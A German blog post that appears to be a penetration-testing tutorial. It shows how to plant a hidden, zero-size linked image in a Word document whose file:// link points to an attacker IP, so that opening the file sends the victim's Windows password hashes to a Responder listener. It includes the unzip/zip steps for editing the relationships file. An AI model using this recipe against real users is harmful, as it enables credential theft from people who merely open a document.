„Redirect to SMB“-Angriff über Word-Dokument

„Redirect to SMB“ ist eine sehr alte Möglichkeit, einem Windows-System Passwort-Hashes des angemeldeten Benutzers zu entlocken. Hierfür gibt es verschiedene Optionen, bei denen immer ein file://-Link verwendet wird. Im folgenden Beispiel möchte ich einmal zeigen, wie man über ein präpariertes Word-Dokument ohne Makros ein Windows-System dazu zwingt, einem Angreifer den Passwort-Hash zu verraten.

  1. Valides Bild im Word-Dokument verlinken – Word weigert sich, nicht existierende Dateien als Link aufzunehmen.
  2. Das verlinkte Bild kann man nun nett verstecken, indem man zum Beispiel die Größe auf 0% reduziert und unverfänglichen Text einfügt.
  3. Die Datei als docx speichern
  4. docx-Dateien sind prinzipiell zip-Archive, die man entpacken kann
    unzip smb_redirect.docx && rm smb_redirect.docx
    
  5. In der Datei „word/_rels/document.xml.rels“ nach dem Bild-Link suchen und mit der IP oder dem Hostnamen des Angreifers ersetzen. In diesem Fall ist es „file://192.168.56.101/smb.jpg“

  6. Nun kann das Word-Dokument wieder zusammengesetzt werden.
    zip -r smb_redirect.docx *
    
  7. Wenn man nun einen SMB-Listener wie Responder auf dem Ziel-System laufen lässt, werden die Passwort-Hashes des angegriffenen Windows-Benutzers beim Öffnen des Word-Dokuments übertragen.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.